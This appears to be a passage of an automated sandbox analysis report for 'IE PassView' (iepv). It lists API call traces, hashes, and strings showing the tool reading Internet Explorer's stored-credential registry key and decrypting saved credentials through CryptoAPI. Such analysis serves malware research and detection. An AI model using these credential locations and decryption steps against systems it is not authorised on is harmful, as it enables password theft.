                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,-000000F4,?,00000000), ref: 00403EBA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$memcpy$ByteCharLocalMultiWidememcmpwcslen$AllocCloseCryptDecryptErrorFileFreeHandleLastSize_snprintf
                                        • String ID:
                                        • API String ID: 759237780-0
                                        • Opcode ID: 9f63a6c8df6a41276d9e9b54e8453c4e309d1c662af558ed0f70dc69021f87d9
                                        • Instruction ID: 5a396e25a0e2e371601baf4a11bb5320a663969d7504980d27075c5fdfef9917
                                        • Opcode Fuzzy Hash: 9f63a6c8df6a41276d9e9b54e8453c4e309d1c662af558ed0f70dc69021f87d9
                                        • Instruction Fuzzy Hash: AF812EB190021DBFDB11DFA4CC819EEBBBCAF08314F104666F515F7291E374AA498BA5
                                        APIs
                                        • EmptyClipboard.USER32 ref: 00405627
                                          • Part of subcall function 00405476: CreateFileA.KERNELBASE(00000003,80000000,00000001,00000000,00000003,00000000,00000000,00402A1C,9+@,00000001,00000000,?,00402B39), ref: 00405488
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00405644
                                        • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00405655
                                        • GlobalLock.KERNEL32(00000000), ref: 00405662
                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405675
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405684
                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040568D
                                        • GetLastError.KERNEL32 ref: 00405695
                                        • CloseHandle.KERNEL32(?), ref: 004056A1
                                        • GetLastError.KERNEL32 ref: 004056AC
                                        • CloseClipboard.USER32 ref: 004056B5
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                        • String ID:
                                        • API String ID: 3604893535-0
                                        • Opcode ID: f2f17b07bb0335d9a99cc59ec3e918da205252a17b05eee3ff07b88de48dafc0
                                        • Instruction ID: b3381adad55cc61a9571f3bb3b737ed98b2e7952980a3a8cd54df1fddcaa999b
                                        • Opcode Fuzzy Hash: f2f17b07bb0335d9a99cc59ec3e918da205252a17b05eee3ff07b88de48dafc0
                                        • Instruction Fuzzy Hash: C7116D71500215ABD7005BB2EE4CB9F7BBCEB04316F104975F606F52A0DB7589608E69
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • memset.MSVCRT ref: 00403720
                                        • memset.MSVCRT ref: 00403734
                                        • memset.MSVCRT ref: 00403748
                                        • memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                        • memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                        • CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                        • CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                        • CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403810
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$memset$Datamemcpy$AcquireContextCreateDestroy
                                        • String ID:
                                        • API String ID: 1743922700-0
                                        • Opcode ID: 14e35629a3128bee0613ca533326d652462d5b947327fdc8313b13da73cddeeb
                                        • Instruction ID: b8e6fa0fa88a7313e6858724cb14324743422fb50e59470404461193ba04ef97
                                        • Opcode Fuzzy Hash: 14e35629a3128bee0613ca533326d652462d5b947327fdc8313b13da73cddeeb
                                        • Instruction Fuzzy Hash: DB3152B190121DBFDB11AF65CD84EDA7BACEF04348F0080B6BA58E7191D6789F449B64
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,?,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 004034EB
                                        • CryptHashData.ADVAPI32(?,0040360D,00000040,00000000,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 00403504
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 00403514
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,0040360D,00000000,00008004,?,?,?,?,?,?,0040360D,?,00000000,?), ref: 00403530
                                        • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,0040360D,?,00000000,?,?), ref: 0040353C
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Data$AcquireContextCreateDestroyParam
                                        • String ID:
                                        • API String ID: 1860763720-0
                                        • Opcode ID: 4b877a1ff959f46b9567c7ff794a0d3c174698d1a9414c58fd4b414061876083
                                        • Instruction ID: d00e77c013bb9a1e19c89b7e5eb9daec37152487e97aaaa4dd5898c3e5fda709
                                        • Opcode Fuzzy Hash: 4b877a1ff959f46b9567c7ff794a0d3c174698d1a9414c58fd4b414061876083
                                        • Instruction Fuzzy Hash: 3C0179B2500118BFEB019FA2CC85D9EBF7CEB04394F108436FA04B2160D771CE20AB68
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,0002001F,?,?,?,?,00401F08), ref: 00406B5A
                                        • RegDeleteValueA.ADVAPI32(?,?,?,?,?,00401F08), ref: 00406B6A
                                        • RegCloseKey.ADVAPI32(?,?,?,?,00401F08), ref: 00406B78
                                        Strings
                                        • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00406B50
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CloseDeleteOpenValue
                                        • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                        • API String ID: 849931509-680441574
                                        • Opcode ID: c81cf22c6fabc66e4bee59be94239d7f4bb3587603230103c54f94c07f3894af
                                        • Instruction ID: 6b20d1d0df886fc3f1f553280bd720f214ad9360600cc10c6d05b814fa5e3032
                                        • Opcode Fuzzy Hash: c81cf22c6fabc66e4bee59be94239d7f4bb3587603230103c54f94c07f3894af
                                        • Instruction Fuzzy Hash: 0FE01271600238BBDB105BA2DE09E9BBE7CEB14794B100435FA06F1151D6B59A20DA98
                                        APIs
                                          • Part of subcall function 00403391: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,?,?,00403859,?,00000000,00000000,?), ref: 0040347C
                                        • CryptHashData.ADVAPI32(?,00000000,00000000,00000000,?,00403859,?,00000000,00000000,?), ref: 00403490
                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,00000000,00000000,00008004,?,00403859,?,00000000,00000000,?), ref: 004034B0
                                        • CryptDestroyHash.ADVAPI32(?,?,00403859,?,00000000,00000000,?), ref: 004034BB
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$AcquireContextCreateDataDestroyParam
                                        • String ID:
                                        • API String ID: 1643522540-0
                                        • Opcode ID: e6a31848da2750c105475134efa90e1f688eff6c570cb0a6ecf737a01f34a179
                                        • Instruction ID: 9a451bcebaa05c3b6c0cb3a898a59c77740f218fb4eab63ae73c8459247e7455
                                        • Opcode Fuzzy Hash: e6a31848da2750c105475134efa90e1f688eff6c570cb0a6ecf737a01f34a179
                                        • Instruction Fuzzy Hash: 30F01D71500118FFEB019FA6DD89D9E7B6DFB08355B008436BA05E5161D775CE209B64
                                        APIs
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403720
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403734
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403748
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                          • Part of subcall function 004036F8: CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,000000D0,?,00403E30,?,00000001,0040323B,?,00000002), ref: 00403666
                                        • CryptHashData.ADVAPI32(?,?,?,00000000,?,?,?,?,000000D0,?,00403E30,?,00000001,0040323B,?,00000002), ref: 00403672
                                        • CryptGetHashParam.ADVAPI32(?,00000002,000000D0,?,00000000,00008004,?,00403E30,?,00000001,0040323B,?,00000002,-000000D3,?,000000D0), ref: 0040368E
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: CryptHash$Data$memset$memcpy$CreateParam
                                        • String ID:
                                        • API String ID: 691630331-0
                                        • Opcode ID: 21be408687e41982e73ded46756a3dc6091b572a3391f3c753abb2be30f0aac5
                                        • Instruction ID: 5cf852195970a62b2ecae631277351066405a7b3628ea7fe337fa0e3e3163c91
                                        • Opcode Fuzzy Hash: 21be408687e41982e73ded46756a3dc6091b572a3391f3c753abb2be30f0aac5
                                        • Instruction Fuzzy Hash: EAF0F632000159BBCF225F56DC05CDB3F6EFB84765F04852ABA24A6160C7729A20EBA4
                                        APIs
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403720
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403734
                                          • Part of subcall function 004036F8: memset.MSVCRT ref: 00403748
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,00000000), ref: 00403759
                                          • Part of subcall function 004036F8: memcpy.MSVCRT(?,?,00000014,?,?,00000014,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040376A
                                          • Part of subcall function 004036F8: CryptCreateHash.ADVAPI32(000000D0,00008004,00000000,00000000,?,00008004,00000036,?,00000010,?), ref: 004037C5
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,0000005C,00000040,00000000), ref: 004037E2
                                          • Part of subcall function 004036F8: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 004037F6
                                        • CryptHashData.ADVAPI32(00403E7A,00000000,000000D0,00000000,?,00403E7A,00403E7A,000000D0), ref: 004036C7
                                        • CryptDeriveKey.ADVAPI32(000000D0,00006603,00403E7A,00A80004,?,?,00403E7A,00403E7A,000000D0), ref: 004036DF
                                        • CryptDestroyHash.ADVAPI32(00403E7A), ref: 004036EA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Crypt$Hash$Datamemset$memcpy$CreateDeriveDestroy
                                        • String ID:
                                        • API String ID: 3896772585-0
                                        • Opcode ID: c5d0e55c481ce3b13496b9d6dcb70f892fa54cd53cd6a11a2bd834e00d1b1445
                                        • Instruction ID: 44e90c607e6209aa9459c9a2c4f95b2697e1a2ad7cb6c048210f5492c182dd50
                                        • Opcode Fuzzy Hash: c5d0e55c481ce3b13496b9d6dcb70f892fa54cd53cd6a11a2bd834e00d1b1445
                                        • Instruction Fuzzy Hash: 84F0A936500119BBDF225F95DC09E9ABF69EB04761F048532FA15AA270C7728A30ABA4
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,0040382E,?,00403D84,?,?,?,?,?,?,?,?), ref: 004033A1
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: AcquireContextCrypt
                                        • String ID:
                                        • API String ID: 3951991833-0
                                        • Opcode ID: 3b5615ebe941a9a81dd6eccc60e94903900e891735debf004889eb2f07e5d409
                                        • Instruction ID: 5608fb8a19430fbc1a30ce7a14a882dfbb49de9bc70487ff80e39b615427bb3a
                                        • Opcode Fuzzy Hash: 3b5615ebe941a9a81dd6eccc60e94903900e891735debf004889eb2f07e5d409
                                        • Instruction Fuzzy Hash: 9AC012B0624221AEEF2C0B228E9AB23265CAB10707F0008BABA01F4190FAB498549529
                                        APIs
                                        • CryptReleaseContext.ADVAPI32(?,00000000,00402652), ref: 00403387
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ContextCryptRelease
                                        • String ID:
                                        • API String ID: 829835001-0
                                        • Opcode ID: 7c88731a7504f552f264407fd77c281916d10f2d699e7f60da82b23929a0aa95
                                        • Instruction ID: e0ae15e2777a42615f0fc0b52da8459c9a630cda12a1bac885029add2a630265
                                        • Opcode Fuzzy Hash: 7c88731a7504f552f264407fd77c281916d10f2d699e7f60da82b23929a0aa95
                                        • Instruction Fuzzy Hash: CBC092306003019BEB308F25CD49B1276E8AF40B02FA00869A990E90D0DBB8E450CA2D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$strchr
                                        • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                        • API String ID: 691317191-1843504584
                                        • Opcode ID: 64ae45c69317c8d5a8cdbc06d97254c38d343c4c6fccfcd6bd6cc5379d7ab00d
                                        • Instruction ID: 3a0f13ae24b23bade33cb64b2ccb3be8b7dae0a4221c21c64eb3c4d2ede0942a
                                        • Opcode Fuzzy Hash: 64ae45c69317c8d5a8cdbc06d97254c38d343c4c6fccfcd6bd6cc5379d7ab00d
                                        • Instruction Fuzzy Hash: 6F918072D04219AAEB20DF91CC86FAF776CAF54314F1044BBFD08B61C1EA78B9548B65
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 0040C4E6
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040C4F2
                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 0040C501
                                        • GetWindowLongA.USER32(?,000000F0), ref: 0040C50D
                                        • GetWindowLongA.USER32(00000000,000000EC), ref: 0040C516
                                        • GetWindowLongA.USER32(?,000000EC), ref: 0040C522
                                        • GetWindowRect.USER32(00000000,?), ref: 0040C534
                                        • GetWindowRect.USER32(?,?), ref: 0040C53F
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C553
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C561
                                        • 73A1A570.USER32(?,?,?), ref: 0040C59A
                                        • strlen.MSVCRT ref: 0040C5DA
                                        • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040C5EB
                                        • sprintf.MSVCRT ref: 0040C6F6
                                        • SetWindowTextA.USER32(?,?), ref: 0040C70A
                                        • SetWindowTextA.USER32(?,00000000), ref: 0040C728
                                        • GetDlgItem.USER32(?,00000001), ref: 0040C75E
                                        • GetWindowRect.USER32(00000000,?), ref: 0040C76E
                                        • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040C77C
                                        • GetClientRect.USER32(?,?), ref: 0040C793
                                        • GetWindowRect.USER32(?,?), ref: 0040C79D
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040C7E3
                                        • GetClientRect.USER32(?,?), ref: 0040C7ED
                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040C825
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Rect$Long$ItemPointsText$Client$A570ExtentPoint32sprintfstrlen
                                        • String ID: %s:$EDIT$STATIC
                                        • API String ID: 4065480583-3046471546
                                        • Opcode ID: ac05241936f2d2ff163d095bc9836d102f638af11ece16d3f32f3c81e010e75d
                                        • Instruction ID: 6aad9ee015615c23f100dea8964b97ccebe7d6c2e33fb7990f14215551546888
                                        • Opcode Fuzzy Hash: ac05241936f2d2ff163d095bc9836d102f638af11ece16d3f32f3c81e010e75d
                                        • Instruction Fuzzy Hash: CDB1D171108301AFD710DFA9C985E6BBBE9FF88704F00492DF695922A1D775E8148F16
                                        APIs
                                        • GetDlgItem.USER32(?,000003EC), ref: 0040113D
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 0040114F
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401184
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401191
                                        • GetDlgItem.USER32(?,000003EC), ref: 004011BF
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 004011D1
                                        • GetModuleHandleA.KERNEL32(00000000,?,?), ref: 004011DA
                                        • LoadCursorA.USER32(00000000,00000067), ref: 004011E3
                                        • SetCursor.USER32(00000000,?,?), ref: 004011EA
                                        • GetDlgItem.USER32(?,000003EE), ref: 0040120A
                                        • ChildWindowFromPoint.USER32(?,?,?), ref: 00401217
                                        • GetDlgItem.USER32(?,000003EC), ref: 00401231
                                        • SetBkMode.GDI32(?,00000001), ref: 0040123D
                                        • SetTextColor.GDI32(?,00C00000), ref: 0040124B
                                        • GetSysColorBrush.USER32(0000000F), ref: 00401253
                                        • GetDlgItem.USER32(?,000003EE), ref: 00401273
                                        • EndDialog.USER32(?,00000001), ref: 0040129E
                                        • DeleteObject.GDI32(?), ref: 004012AA
                                        • GetDlgItem.USER32(?,000003ED), ref: 004012CE
                                        • ShowWindow.USER32(00000000), ref: 004012D7
                                        • GetDlgItem.USER32(?,000003EE), ref: 004012E3
                                        • ShowWindow.USER32(00000000), ref: 004012E6
                                        • SetDlgItemTextA.USER32(?,000003EE,00412288), ref: 004012F7
                                        • SetWindowTextA.USER32(?,IE PassView), ref: 00401305
                                        • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040131D
                                        • SetDlgItemTextA.USER32(?,000003EC,?), ref: 0040132E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmp
                                         • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                        • String ID: IE PassView
                                        • API String ID: 829165378-138957450
                                        • Opcode ID: b4c16071b9a7532792fcb4d9f5e964cc282a1dde44ff47dac44f1ca561dbac0a
                                        • Instruction ID: 2d723202b3b5cca2a5e2e0ea46cc793fd76a0364fe4b2736696fc3227fcf8ec2
